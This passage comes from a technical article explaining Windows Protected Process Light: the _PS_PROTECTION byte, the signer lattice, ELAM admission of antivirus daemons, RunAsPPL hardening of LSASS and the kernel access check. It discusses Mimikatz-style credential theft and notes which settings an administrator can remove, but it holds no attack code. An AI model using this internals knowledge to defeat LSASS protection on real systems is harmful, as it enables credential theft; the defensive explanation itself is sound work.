CHK-->>PsPO: strip PROCESS_VM_READ
PsPO->>SAC: residual mask (limited only)
SAC-->>NtOP: limited handle (read denied)
NtOP-->>Mim: STATUS_ACCESS_DENIED (NTSTATUS 0xC0000022, Win32 GetLastError = 5)

Note: If every privilege Windows defines is held by the caller, what is doing the denying? The answer is a kernel structure that the token model does not see and the security descriptor does not influence -- a byte in EPROCESS named Protection, mediating a lattice the access check consults before it ever asks SeAccessCheck about privileges.

This is not a workaround pattern. It is a new dimension. The token model is unchanged. The integrity level is unchanged. The security descriptor on lsass.exe is unchanged. What changed is that the kernel now answers a question it did not ask before: what kind of trust does the caller have to manipulate the address space of the callee?

PPL re-asks the question of who can touch whom one level below the token model.

That mechanism has a name (Protected Process Light), an encoding (a single UCHAR), and a history that does not begin where you would expect. To understand the byte, we have to understand why Microsoft built it in the first place. The next section starts where the history starts: a 2006 Microsoft whitepaper about Hollywood.

2. Historical Origins -- Vista, DRM, and the First Protected Process

The kernel mechanism that today denies admins access to LSASS was invented in 2006 to keep Hollywood happy. The cover page of Microsoft's process_vista.doc whitepaper opens with a sentence almost no one quotes today:

The Microsoft Windows Vista operating system introduces a new type of process known as a protected process to enhance support for Digital Rights Management functionality in Windows Vista.

The whitepaper was published November 27, 2006, two months before Vista's GA, and it is the architectural seed of the byte we will be staring at for the rest of this article [@vista-process-doc]. The motivation was not credential theft. It was HD-DVD and Blu-ray content protection. Studio licensing agreements required that even an administrator on the local machine could not read the audio device graph isolation host's memory while protected content was playing. The Protected Media Path required a kernel-enforced barrier between admin user-mode and the media pipeline.

The Vista-era set of components that decrypt and render high-definition video and audio content under DRM. PMP requires kernel-enforced isolation of `audiodg.exe` and a small set of related processes so that local administrators cannot dump intermediate content keys from process memory.

The Vista design was minimal. A single bit in EPROCESS marks a process as protected. At NtCreateUserProcess, the kernel parses the main image's Authenticode signature and looks for a specific Microsoft EKU OID that only the PMP signing root can issue [@forshaw-2018-10]. If the EKU is present and the chain resolves to that root, the kernel flips the bit. On every subsequent NtOpenProcess against that process, the kernel strips a fixed set of access rights from the mask, no matter who is asking.

Alex Ionescu, then a Windows internals researcher and now CrowdStrike's Chief Technology Innovation Officer, enumerated the denials in 2007 [@ionescu-pp-bad-idea]:

A typical process cannot perform operations such as the following on a protected process: Inject a thread into a protected process; Access the virtual memory of a protected process; Debug an active protected process; Duplicate a handle from a protected process; Change the quota or working set of a protected process.

Five denials. One bit. One certificate root. Ionescu's same essay, titled "Why Protected Processes Are A Bad Idea," made a structural argument that aged well: putting a DRM mechanism in the kernel is a category error. The mechanism is too narrow for non-DRM use because the only certificate accepted is Microsoft's PMP signing root, and the only operations gated are the ones Hollywood cared about. Third parties cannot opt in, and Microsoft itself cannot graduate the level of trust.Ionescu's 2007 critique remains worth reading on its own merits. The argument that DRM-shaped kernel features tend to be reused for security mitigations and that this reuse changes their threat-model semantics is exactly what plays out over the next seven years [@ionescu-pp-bad-idea].

The seven-year pause is its own story. Vista shipped, Vista was followed by Windows 7, and Windows 7 was followed by Windows 8 -- and through all of it, the access-check primitive that protects audiodg.exe from administrators remained a DRM artefact. The primitive existed; the graduated trust dimension did not. Two parallel failures pushed Microsoft toward widening the encoding.

The first was Mimikatz. Benjamin Delpy's tool was first released in May 2011 and refined through 2013 [@mimikatz-wikipedia]; it made it trivial for an administrator to extract NTLM hashes and Kerberos session keys from lsass.exe. The countermeasure of restricting SeDebugPrivilege was useless; an attacker who has SYSTEM has every privilege. What Mimikatz exploited was a primitive gap: the kernel had no way to say "lsass is protected against administrators but reachable from privileged Microsoft services."

The second was Mateusz Jurczyk's CSRSS jailbreak of Windows 8 RT in 2013. Jurczyk (who writes as j00ru) catalogued more than seventy Win32k system calls that the kernel guarded with the pattern if (PsGetCurrentProcess() != gpepCsrss) return STATUS_ACCESS_DENIED; [@j00ru-1393]. That gating mechanism worked only as long as nobody could inject code into csrss.exe. On Windows 8 RT, an attacker who could inject into csrss.exe could bypass Microsoft's locked-down Surface RT shell. Ionescu later observed that "In Windows 8.1 RT, this jailbreak is 'fixed', by virtue that code can no longer be injected into Csrss.exe for the attack" [@ionescu-part2]. The fix made csrss.exe a PPL at the WinTcb rung, and the same machinery was generalised to lsass.exe and the Antimalware tier.

Note: Mimikatz proved Microsoft needed a graduated trust dimension for lsass.exe. The j00ru CSRSS jailbreak proved Microsoft needed it for csrss.exe too. The same widening of the encoding answered both.

flowchart LR subgraph Vista2006[Vista 2006 -- single bit] V1[EPROCESS protected = 0 or 1] V2[Certificate root: PMP only] V3[Access denials: hardcoded 5-tuple] end subgraph Win81[Windows 8.1 -- _PS_PROTECTION byte] W1[Type: 3 bits] W2[Audit: 1 bit] W3[Signer rung: 4 bits] W4[Certificate roots: per-EKU sub-OIDs] W5[Access denials: lattice over signer] end V1 --> W1 V2 --> W4 V3 --> W5 The DRM-to-credentials repurposing is not unique to PPL. The same pattern shows up in HVCI (originally a Hyper-V kernel-mode integrity feature, later repurposed for general code-integrity enforcement) and in Trustlets (originally an enterprise feature for Credential Guard, later generalised). Kernel mechanisms born in one threat model rarely stay confined to it.

Microsoft already had the access-check primitive. What it didn't have, in 2007, was a way to ask "how much trust does this process carry?" The fix would not arrive until Windows 8.1 in October 2013, and when it arrived, it would fit in a single byte.

3. `_PS_PROTECTION` -- The Single-Byte Encoding

The 8.1 fix is so compact it fits in a single byte. Ionescu's Part 1 of the "Evolution of Protected Processes" series, published November 22, 2013, gives the kernel structure verbatim [@ionescu-part1]:

typedef struct _PS_PROTECTION {
    union {
        UCHAR Level;
        struct {
            UCHAR Type   : 3;
            UCHAR Audit  : 1;
            UCHAR Signer : 4;
        };
    };
} PS_PROTECTION, *PPS_PROTECTION;

Three fields. One byte. The union with Level:UCHAR exists so that two _PS_PROTECTION values can be compared with a single byte load and a single byte compare. The kernel does this on every NtOpenProcess. Speed matters; this is the hot path of the security model.

The kernel structure that encodes a process's protection state in eight bits: three bits of Type (`None`, `ProtectedLight`, `Protected`), one bit of Audit (intended as a forensic side-channel hint, although the exact runtime semantics are not enumerated in the public sources cited here), and four bits of Signer rung. Stored as `EPROCESS.Protection`.

The Type field has three values. PsProtectedTypeNone = 0 marks a regular process. PsProtectedTypeProtectedLight = 1 marks a PPL -- the graduated path introduced in 8.1. PsProtectedTypeProtected = 2 marks a "heavy" Vista-style PP. Heavy PPs still exist; they retain the original DRM semantics where almost nothing from below the protection level may touch them. PPLs are the new general-purpose path where the signer rung mediates a graduated lattice.

The Audit bit is the least documented of the three fields. Ionescu Part 1 lists it as Audit : Pos 3, 1 Bit with no semantic gloss; itm4n's RunAsPPL header annotates it as // Reserved; Microsoft Learn enumerates CodeIntegrity events 3033, 3063, 3065, and 3066, but those are triggered by the AuditLevel configuration under Image File Execution Options\LSASS.exe and concern DLL-load failures, not per-process OpenProcess denials [@ionescu-part1] [@itm4n-runasppl] [@learn-runasppl]. The field's name implies a forensic side-channel, and the bit-position is reserved; the precise runtime emission shape is not enumerated in the public sources cited here.

The Signer field is the structurally interesting one. Ionescu's 2013 enumeration names eight values [@ionescu-part1]:

Signer constant	Value	Used for
`PsProtectedSignerNone`	0	Non-protected (no rung)
`PsProtectedSignerAuthenticode`	1	Generic third-party Authenticode (early PPL guests)
`PsProtectedSignerCodeGen`	2	.NET native runtime code generators
`PsProtectedSignerAntimalware`	3	EDR / AV daemons admitted via ELAM
`PsProtectedSignerLsa`	4	`lsass.exe` under `RunAsPPL`
`PsProtectedSignerWindows`	5	Microsoft Windows components below TCB
`PsProtectedSignerWinTcb`	6	`csrss.exe`, `smss.exe`, `services.exe` -- the inbox TCB
`PsProtectedSignerMax`	7	Sentinel value (enumeration upper bound)

Note: Ionescu's 2013 list is the authoritative baseline enumeration. It is not a permanent enumeration. By 2018, James Forshaw's PowerShell tooling (NtApiDotNet) was enumerating an additional App = 8 signer used for AppContainer / TruePlay scenarios [@forshaw-2018-10]. Newer builds of Windows extend the enumeration further. The article will name WinTcb (Microsoft's documented inbox-TCB rung) and Antimalware (the only non-Microsoft-admissible rung) repeatedly, because they are the load-bearing ones. The intermediate values evolve.

Adjacent to EPROCESS.Protection are two related fields, EPROCESS.SignatureLevel and EPROCESS.SectionSignatureLevel, which Ionescu introduces in Part 3 [@ionescu-part3]. These fields encode the binary integrity the kernel demands at process creation and at every subsequent section load, and they are filled in from a 16-entry Signing Level table that runs from Unchecked = 0 up to Windows TCB = 14. The Signer rung in Protection answers "what kind of trust does this process hold?" The SignatureLevel pair answers "what binaries is this process allowed to map?" They are not the same question.

Now the worked decode. Given the byte value 0x41, the encoding falls out by hand:

Low three bits (Type): 0x41 & 0x07 = 0x01 -- PsProtectedTypeProtectedLight.
Bit 3 (Audit): (0x41 >> 3) & 0x01 = 0 -- Audit off.
High four bits (Signer): (0x41 >> 4) & 0x0F = 0x04 -- PsProtectedSignerLsa.

A process with EPROCESS.Protection = 0x41 is a PPL signed at the Lsa rung. That is exactly what lsass.exe looks like on a host with RunAsPPL = 1. Ionescu's blog explicitly states: "it's easy to read 0x41 as Lsa (0x4) + PPL (0x1)" [@ionescu-part1]. The Defender service MsMpEng.exe, signed at the Antimalware rung, has Protection = 0x31. The session manager csrss.exe, signed at WinTcb, has Protection = 0x61.

flowchart TD B[byte: 8 bits] B --> F1[bits 0..2: Type] B --> F2[bit 3: Audit] B --> F3[bits 4..7: Signer] F1 --> T0[0 = None] F1 --> T1[1 = ProtectedLight PPL] F1 --> T2[2 = Protected PP] F3 --> S0[0 None] F3 --> S1[1 Authenticode] F3 --> S2[2 CodeGen] F3 --> S3[3 Antimalware] F3 --> S4[4 Lsa] F3 --> S5[5 Windows] F3 --> S6[6 WinTcb]

{` function decodeProtection(byteValue) { const type = byteValue & 0x07; const audit = (byteValue >> 3) & 0x01; const signer = (byteValue >> 4) & 0x0F; const typeNames = ['None', 'ProtectedLight', 'Protected']; const signerNames = [ 'None', 'Authenticode', 'CodeGen', 'Antimalware', 'Lsa', 'Windows', 'WinTcb', 'Max' ]; return { raw: '0x' + byteValue.toString(16).padStart(2, '0'), type: typeNames[type] || 'unknown(' + type + ')', audit: audit ? 'on' : 'off', signer: signerNames[signer] || 'unknown(' + signer + ')' }; }

// Worked examples from real Windows processes console.log('MsMpEng.exe (Defender):', decodeProtection(0x31)); console.log('lsass.exe under RunAsPPL:', decodeProtection(0x41)); console.log('csrss.exe (WinTcb):', decodeProtection(0x61)); `}

Note: One byte, three fields, eight signer rungs. The kernel reads it on every OpenProcess, before any token check, before any ACL evaluation. The encoding is the entire vocabulary the kernel has for asking how trusted a process is.

The encoding tells the kernel what kind of trust a process holds. It says nothing about who can touch whom across rungs. That rule -- the lattice -- is the structure imposed on top of the bytes. The next section is the lattice.

4. The Signer Lattice -- Who Can Open Whom

itm4n's 2021 walkthrough states the three rules verbatim, and they have the rare quality of being short enough to memorise [@itm4n-scrt]:

A PP can open a PP or a PPL with full access if its signer type is greater or equal. A PPL can open a PPL with full access if its signer type is greater or equal. A PPL cannot open a PP with full access, regardless of its signer type.

Three rules. They settle every cross-process access question PPL gates. Let us name them and then read off their consequences.

Rule 1. A PP at signer $S_c$ may open with full access a PP or PPL at signer $S_t$ if and only if $S_c \ge S_t$.

Rule 2. A PPL at signer $S_c$ may open with full access a PPL at signer $S_t$ if and only if $S_c \ge S_t$.

Rule 3. A PPL cannot open a PP with full access, regardless of signer.

The qualifier "with full access" is load-bearing. PPL's lattice gates the full mask -- PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, PROCESS_ALL_ACCESS. A separate limited mask (SYNCHRONIZE, PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_SUSPEND_RESUME, and -- for callers below the Authenticode/CodeGen/Windows tier -- PROCESS_TERMINATE) is allowed when the security descriptor permits. The tier matters. Ionescu's verbatim RtlProtectedAccess[] table widens the deny mask from 0xFC7FE to 0xFC7FF at the Antimalware, Lsa, and WinTcb rungs -- one extra bit, bit 0, which is PROCESS_TERMINATE [@ionescu-part2]. So an administrator can still call OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, ...) against a protected lsass.exe to enumerate threads, but cannot terminate a PPL/Antimalware, PPL/Lsa, or PPL/WinTcb daemon via a direct kill. The lattice does not lock the process; it locks the interesting access, and for the top-tier rungs it also locks the kill.

Caller signer \ Target signer	None	Authenticode (1)	Antimalware (3)	Lsa (4)	Windows (5)	WinTcb (6)
None (admin, integrity SYSTEM)	full	denied	denied	denied	denied	denied
PPL/Authenticode (1)	full	full	denied	denied	denied	denied
PPL/Antimalware (3)	full	full	full	denied	denied	denied
PPL/Lsa (4)	full	full	full	full	denied	denied
PPL/Windows (5)	full	full	full	full	full	denied
PPL/WinTcb (6)	full	full	full	full	full	full

Where "denied" means the full mask is rejected; the limited mask continues to apply per the target's security descriptor.

flowchart BT None[None / unprotected] Auth[Authenticode] CG[CodeGen] AM[Antimalware] Lsa[Lsa] Win[Windows] Tcb[WinTcb] None --> Auth Auth --> CG CG --> AM AM --> Lsa Lsa --> Win Win --> Tcb

The Enhanced Key Usage side of the design holds the lattice together. Microsoft's EKU OID arc 1.3.6.1.4.1.311.10.3.* defines sub-OIDs per signer rung [@iana-pen311] [@oid-base-eku-arc], and at process creation the kernel parses the main image's Authenticode signature and walks its EKU extensions to determine which rung the binary is entitled to claim. If the certificate chain resolves cleanly to a Microsoft-issued root and carries the rung's sub-OID, the kernel records the rung. Otherwise the process either starts unprotected or refuses to start at all.

An X.509 v3 certificate extension that asserts what specific purposes a certificate is allowed to certify. Microsoft uses sub-OIDs under `1.3.6.1.4.1.311.10.3.*` to encode protected-process signer rungs as EKU values [@iana-pen311] [@oid-base-eku-arc]. The kernel checks the EKU at process creation; the certificate chain anchors which Microsoft-issued sub-CA may issue at each rung.The IANA Private Enterprise Number `311` is registered to Microsoft under the PEN prefix `1.3.6.1.4.1.` [@iana-pen311], so `1.3.6.1.4.1.311.*` is the catch-all namespace for Microsoft-specific X.509 extensions; the `10.3.*` arc within it is the Microsoft Enhanced Key Usage (purpose) sub-tree [@oid-base-eku-arc], and `10.3.` slots map to specific signer purposes including protected-process rungs.

The most important property of this design is the resolution point. The kernel parses the EKU exactly once, at NtCreateUserProcess. It stores the resulting rung in EPROCESS.Protection. On every subsequent OpenProcess against that process, the kernel consults the byte, not the certificate. This makes the access check fast (one byte load, one byte compare) and decouples policy at runtime from policy at signing time. It also creates the structural seam that every public bypass since 2018 has exploited, because the kernel's confidence in the byte is exactly the confidence it had in the certificate at process-create time, projected forward indefinitely.

Ionescu's Part 2 names the implementation directly. The lattice is not code; it is a data table named RtlProtectedAccess[] baked into ntoskrnl.exe [@ionescu-part2]. Each row of that table corresponds to a (signer, target-type) pair and encodes which access bits are allowed in the full mask. The relevant runtime routines are PspProcessOpen and PspThreadOpen (the object-manager open callbacks), PspCheckForInvalidAccessByProtection (which performs the check), RtlTestProtectedAccess (which applies the lattice row), and RtlValidProtectionLevel (which sanity-checks the encoded byte for consistency).

Note: The decision of who can touch whom is encoded in a table inside ntoskrnl.exe. Changing the lattice means changing a table; widening or narrowing it does not require new code. This is why Microsoft can add App = 8 to the enumeration over time without touching the access-check routine.

Note one symmetry that becomes important later. "Greater or equal" means that within a rung, every PPL can read every other PPL. Two co-resident PPL/Antimalware daemons -- Microsoft Defender's MsMpEng.exe and a third-party EDR's agent -- can call PROCESS_VM_READ on each other. Within-rung peers leak to each other by design. The lattice prevents escalation, not peer access.

The lattice settles the rule. The next question is admission: who decides which binaries are allowed to claim the Antimalware rung, and how does Microsoft admit third-party code into it at all? The answer is a driver.

5. The Antimalware Rung -- ELAM and Third-Party Code at PPL

PPL is interesting only if it admits non-Microsoft code at some rung. The Vista PP design admitted nobody; it required a Microsoft PMP root certificate, full stop. PPL inherited that constraint at every rung except one. The Antimalware rung -- signer value 3 -- is the only rung where third-party vendors can ship their own user-mode binaries as protected processes. The admission mechanism is the Early Launch Anti-Malware driver.

A specially signed Microsoft-certified kernel driver shipped by an anti-malware vendor that loads before any other boot-start driver. The ELAM driver participates in trusted-boot measurement, vouches for follow-on drivers, and -- critical to PPL -- carries an embedded resource section enumerating the vendor's user-mode signing certificate hashes. The kernel uses that resource section to admit the vendor's user-mode daemon binaries to `PPL/Antimalware` at service start.

Microsoft Learn's "Protecting Anti-Malware Services" page describes the boot-time admission flow in two sentences [@learn-am-services]:

The driver must have an embedded resource section containing the information of the certificates used to sign the user mode service binaries. During the boot process, this resource section will be extracted from the ELAM driver to validate the certificate information and register the anti-malware service.

Two consequences. First, the third-party signer set is bounded by a kernel-readable resource section, not by an open EKU. Microsoft, not the vendor, controls which user-mode binaries are admissible. Second, the certificate hashes are baked into the driver at signing time and re-validated at every service start. A vendor cannot widen the admissible set after the fact; an attacker cannot drop in their own user-mode binary unless its hash is already listed.

The gate that decides which vendors get ELAM drivers in the first place is the Microsoft Virus Initiative. Microsoft Learn's MVI criteria page enumerates the requirement explicitly [@learn-mvi]:

Your security solution must be certified within the last 12 months by at least one of the organizations listed below: AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, West Coast Labs.

The same page requires "use of Trusted Signing," Microsoft's cloud-managed code signing service. The implications are operational. To ship code at PPL/Antimalware, a vendor must (a) hold MVI membership, (b) maintain independent-lab certification, (c) author an ELAM driver, (d) get the driver through Microsoft WHQL and have it Microsoft co-signed, and (e) embed the user-mode certificate hashes in the driver's resource section.

A Microsoft program for anti-malware vendors that gates access to ELAM driver signing and to specific Defender APIs. Membership requires independent-lab certification (renewed annually) and Trusted Signing usage; in practical terms, MVI membership is the entry ticket to deploying user-mode binaries at `PPL/Antimalware`. The implication of MVI is that an indie security tool, however technically sound, cannot deploy as `PPL/Antimalware`. The gate is not technical but commercial: independent-lab certification fees, annual renewals, and the engineering investment of building a production-grade ELAM driver. The signer rung is *signed*; the signing program is *gated*. sequenceDiagram participant BM as Boot manager participant K as Windows kernel participant ELAM as Vendor ELAM driver (.sys) participant SCM as Service Control Manager participant CI as ci.dll (CodeIntegrity) participant Svc as Vendor service (e.g. EDR daemon) BM->>K: load boot drivers K->>ELAM: load ELAM driver early K->>ELAM: read embedded ELAM resource section K->>K: cache vendor user-mode cert hashes Note over K,SCM: Boot continues, OS initialises SCM->>Svc: start vendor service Svc->>CI: validate service binary signature CI->>K: lookup vendor cert against cached hashes K-->>CI: match -- admit at PPL/Antimalware CI-->>Svc: launch as PPL/Antimalware (Protection = 0x31)

By 2024, every major commercial EDR ships through this path. Microsoft Defender's MsMpEng.exe uses the inbox WdBoot.sys ELAM driverWdBoot.sys ("Windows Defender Boot Driver") is Microsoft's inbox first-party ELAM driver; it ships in every Windows install and is loaded before any third-party ELAM driver. The canonical reference implementation of the ELAM resource-section pattern is Microsoft's Windows-driver-samples/security/elam repository [@ms-elam-sample], which also documents the Early Launch EKU 1.3.6.1.4.1.311.61.4.1 verbatim.. Third-party members of Microsoft's Virus Initiative -- the cohort gated by the MVI criteria quoted above [@learn-mvi] -- ship their own vendor ELAM drivers and run their main user-mode daemons at PPL/Antimalware. Microsoft Learn's "Early Launch Antimalware" page is the canonical confirmation [@learn-elam]:

Because an ELAM service runs as a PPL (Protected Process Light), you need to debug using a kernel debugger.

One Microsoft-signed sentence and a billion endpoints. EDR vendors get protection against administrator-level tampering for free, on top of the kernel telemetry their drivers already collect. Microsoft gets a viable third-party security market without widening the EKU gates beyond a controllable set of vendors.

ELAM admits the daemon. The next operational question is what Microsoft does for lsass.exe itself -- the canonical credential store, the original Mimikatz target. The mechanism is called RunAsPPL.

6. RunAsPPL -- Hardening LSASS

The registry value that produced the Mimikatz failure in Section 1 is a single DWORD. itm4n's walkthrough names it verbatim [@itm4n-runasppl]:

Open the key HKLM\SYSTEM\CurrentControlSet\Control\Lsa; add the DWORD value RunAsPPL and set it to 1; reboot.

After reboot, lsass.exe launches at PPL/Lsa, signer rung 4, protection byte 0x41. Mimikatz running with full SYSTEM-integrity and SeDebugPrivilege then receives 0x00000005 on OpenProcess(PROCESS_VM_READ, lsass.exe). The registry knob is one DWORD; the consequences are large.

The Windows user-mode process that holds NTLM password hashes, Kerberos Ticket Granting Tickets, MSV1_0 credential caches, DPAPI master keys, and (on legacy builds before Microsoft's 2014 KB2871997 update [@ms-kb2871997]) WDigest plaintext passwords. The canonical target of credential-theft tooling since 2011.

The threat being mitigated is simple. Mimikatz reads LSASS memory via OpenProcess(PROCESS_VM_READ, lsass.exe), walks the internal key-store structures, and extracts NTLM hashes, Kerberos session keys, and (on older configurations) cached plaintext. Restricting SeDebugPrivilege does not work, because an attacker with SYSTEM has every privilege. Restricting the security descriptor on lsass.exe does not work either, because legitimate services need to interact with it. PPL is the right primitive: it gates the full mask irrespective of token state, and the kernel admits only Microsoft-signed code into the Lsa rung.

RunAsPPL = 1 is the stronger form of the setting on Secure Boot-capable machines. On the next boot, the kernel automatically mirrors the policy into a Secure Boot-anchored UEFI variable; once set, the protection survives registry rollback. An attacker who removes the registry key finds that LSASS still launches as PPL on the next boot. The only path to remove the protection is to disable Secure Boot at the firmware level, which requires physical access and which trips other defences. Microsoft Learn's documentation describes it verbatim [@learn-runasppl]:

You can achieve further protection when you use Unified Extensible Firmware Interface (UEFI) lock and Secure Boot. When these settings are enabled, disabling the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa registry key has no effect.

This is RunAsPPL = 1. For environments that need admin-removable protection without the UEFI lock, RunAsPPL = 2 (available on Win11 22H2 and later) omits the UEFI variable. The policy lives in the registry only and is removable by any administrator (or by malware running as administrator) who simply deletes the registry value before reboot.

`RunAsPPL` value	Behaviour	Removable by?	Persistence
`0` (or absent)	LSASS runs unprotected	n/a	none
`1`	LSASS runs as PPL/Lsa; policy mirrored to UEFI variable on Secure Boot machines	Physical access + Secure Boot disable	Firmware-anchored
`2`	LSASS runs as PPL/Lsa; registry only (Win11 22H2+ only)	Any admin who deletes the key	Registry only

Note: The RunAsPPL = 1 setting is the practical answer to "what stops an attacker who is willing to reboot?" Once the UEFI variable is set, neither registry rollback nor PE-based offline attacks on the registry hive can disable LSA protection on the next boot.

The deployment cost of RunAsPPL is compatibility with third-party authentication modules. LSASS hosts a set of plug-ins: smart-card middleware, third-party Cryptographic Service Providers (CSPs), password-filter DLLs, alternative authentication packages. Under RunAsPPL, the kernel demands that every DLL loaded into LSASS be Microsoft-signed at the LSA level (signer rung 4). Vendor DLLs that lack the right EKU are rejected at section creation. The rejections surface as CodeIntegrity events in the system event log. Microsoft Learn enumerates the two relevant event IDs [@learn-runasppl]:

Event 3065 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn't meet the security requirements for shared sections.

Event 3066 occurs when a code integrity check determines that a process, usually LSASS.exe, attempts to load a driver that doesn't meet the Microsoft signing level requirements.

This is why Microsoft recommends running the setting in audit mode before enforcement. Audit mode is enabled by setting a separate AuditLevel DWORD to 8, but -- critically -- under a different registry key from the one that hosts RunAsPPL. Microsoft Learn places AuditLevel under the Image File Execution Options hive for LSASS.exe and names the path verbatim [@learn-runasppl]:

Open the Registry Editor, or enter RegEdit.exe in the Run dialog, and then go to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe registry key. Open the AuditLevel value. Set its data type to dword and its data value to 00000008.

Note: RunAsPPL sits under HKLM\SYSTEM\CurrentControlSet\Control\Lsa. AuditLevel = 8 sits under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe. A defender who edits "the same key" silently sets the wrong value and audit mode never engages. The deployment looks correct from the registry; the log surface is empty; the rollout breaks production on enforcement day. Two values. Two hives. Read this twice.

In audit mode, the kernel emits the same 3065 / 3066 events for would-be load rejections but allows the loads to proceed. Two months of audit-mode telemetry typically surfaces every smart-card middleware DLL, every password-filter, every third-party CSP on a corporate fleet. Once the audit log is clean (every vendor's modules have been re-signed at the LSA level or replaced), enforcement mode can be turned on without breaking production logins.

Note: Skipping audit mode is the most common cause of LSA protection rollouts being rolled back after a wave of authentication failures. See §11 Item 1 for the full audit-then-enforce-then-UEFI-lock recipe.

The deployment cadence has been deliberately glacial. RunAsPPL shipped in Windows 8.1 in October 2013 -- opt-in. It remained opt-in for nine years. Microsoft Learn records the inflection [@learn-runasppl]:

Audit mode for added LSA protection is enabled by default on devices running Windows 11 version 22H2 and later.

Audit mode default-on. Not enforcement. The Windows 11 24H2 release expanded the audit-mode rollout further. Eleven years from opt-in to effective default. The pace reflects the compatibility risk: every domain with a single non-Microsoft-signed LSASS plug-in would have surfaced as a support call.

The registry knob is simple. The kernel check that enforces it is not. The next section walks the access-check pipeline in detail, because the structural reason SeDebugPrivilege cannot help an attacker is the order in which the kernel asks its questions.

7. The Kernel Access Check -- What Happens Inside `NtOpenProcess`

Recall the trace from Section 1. The denial happens before SeAccessCheck runs. The reason SeDebugPrivilege does not help is not that the kernel decided to override the privilege; it is that the kernel never asked about the privilege. The order matters. Let us walk it.

The Win32 caller invokes OpenProcess, which thunks through kernel32.dll to the syscall NtOpenProcess. NtOpenProcess does its handle-lookup and dispatches to the process-type object-manager open callback, PspProcessOpen. Ionescu's Part 2 names the path verbatim [@ionescu-part2]:

Access to protected processes (and their threads) is gated by the PspProcessOpen and PspThreadOpen object manager callback routines, which perform two checks. The first, done by calling PspCheckForInvalidAccessByProtection (which in turn calls RtlTestProtectedAccess and RtlValidProtectionLevel) ...

PspCheckForInvalidAccessByProtection does two things. First, it splits the caller's requested access mask into two subsets:

The limited mask -- a fixed set of bits (SYNCHRONIZE, PROCESS_QUERY_LIMITED_INFORMATION, and a small handful of others) that the lattice never forbids. The limited mask is subject only to the standard SeAccessCheck against the target's DACL.
The full mask -- everything else, including PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_CREATE_THREAD, PROCESS_DUP_HANDLE, and PROCESS_ALL_ACCESS. The full mask is subject to the lattice rule.

The subset of `PROCESS_*` access rights that the PPL lattice always allows the standard `SeAccessCheck` to evaluate. Includes `SYNCHRONIZE`, `PROCESS_QUERY_LIMITED_INFORMATION`, `PROCESS_SET_LIMITED_INFORMATION`, and `PROCESS_SUSPEND_RESUME`. `PROCESS_TERMINATE` is included for callers below the Antimalware tier (deny mask `0xFC7FE`), but the kernel widens the deny mask to `0xFC7FF` at the `Antimalware`, `Lsa`, and `WinTcb` rungs -- bit 0, `PROCESS_TERMINATE` -- making those three rungs unkillable except from peers or higher.

Second, it indexes into RtlProtectedAccess[] using the caller's signer rung and the target's type, retrieves the row of permissible access bits, and ANDs the row with the full mask. If the result is non-empty, the access proceeds; if the result is zero, the kernel strips the full-mask bits from the request and returns either the limited subset (if the caller asked for any limited bits) or STATUS_ACCESS_DENIED. RtlValidProtectionLevel runs alongside as a sanity check on the encoded byte to catch malformed EPROCESS.Protection values that would otherwise let the lattice walk off the end of the table.

sequenceDiagram participant App as Caller (any token) participant Nt as NtOpenProcess participant PsPO as PspProcessOpen participant Chk as PspCheckForInvalidAccessByProtection participant Rtl as RtlTestProtectedAccess + RtlValidProtectionLevel participant Tab as RtlProtectedAccess[] table participant SAC as SeAccessCheck App->>Nt: NtOpenProcess(DesiredAccess) Nt->>PsPO: dispatch PsPO->>Chk: protection check Chk->>Rtl: lookup caller / target rungs Rtl->>Tab: index row, retrieve allowed bits Tab-->>Rtl: row of allowed access bits Rtl-->>Chk: full mask allowed or stripped Chk-->>PsPO: residual mask (full or limited) PsPO->>SAC: residual mask vs DACL + token SAC-->>Nt: final mask Nt-->>App: handle or STATUS_ACCESS_DENIED

Key idea: The protection check runs before SeAccessCheck. Privileges are evaluated by SeAccessCheck. The reason SeDebugPrivilege does not help is structural -- it is not consulted at the moment of denial.

Four worked traces make this concrete.

Case (a): admin -> lsass with PROCESS_ALL_ACCESS. The caller has no EPROCESS.Protection.Type (it is None). The target is PPL/Lsa. The lattice forbids the full mask. The kernel strips every bit of PROCESS_ALL_ACCESS except the limited subset. The caller wanted to write memory; the limited subset cannot write memory; the operation effectively fails. This is the Mimikatz scenario.

Case (b): admin -> lsass with PROCESS_QUERY_LIMITED_INFORMATION. Same caller, same target, but the requested mask sits entirely in the limited subset. The lattice does not gate the limited mask. SeAccessCheck evaluates the DACL on lsass.exe, finds that administrators are permitted to query basic process information, and the call succeeds. This is why Process Explorer can still enumerate lsass.exe and show its threads even when LSA protection is enabled.

Case (c): MsMpEng.exe (PPL/Antimalware, rung 3) -> lsass.exe (PPL/Lsa, rung 4) with PROCESS_VM_READ. The lattice rule: caller rung 3 < target rung 4, so the full mask is denied. Defender cannot read LSASS memory. Defender does not need to; the cross-rung isolation prevents one Microsoft service from reading another Microsoft service's secrets even within the same trusted system.

Case (d): hypothetical PPL/WinTcb (rung 6) -> lsass.exe (PPL/Lsa, rung 4) with PROCESS_VM_READ. The lattice rule: caller rung 6 >= target rung 4, so the full mask is allowed. A process signed at the WinTcb rung can read LSASS memory by design. This is how Service Control Manager and Windows Error Reporting can still interact with protected lsass.exe.

Caller	Target	Mask	Lattice rule	Outcome
Admin, no Protection	PPL/Lsa	PROCESS_ALL_ACCESS	Caller has no rung	Full mask stripped (denied)
Admin, no Protection	PPL/Lsa	PROCESS_QUERY_LIMITED_INFORMATION	Limited mask	Allowed (DACL permitting)
PPL/Antimalware (3)	PPL/Lsa (4)	PROCESS_VM_READ	3 < 4	Denied
PPL/WinTcb (6)	PPL/Lsa (4)	PROCESS_VM_READ	6 >= 4	Allowed

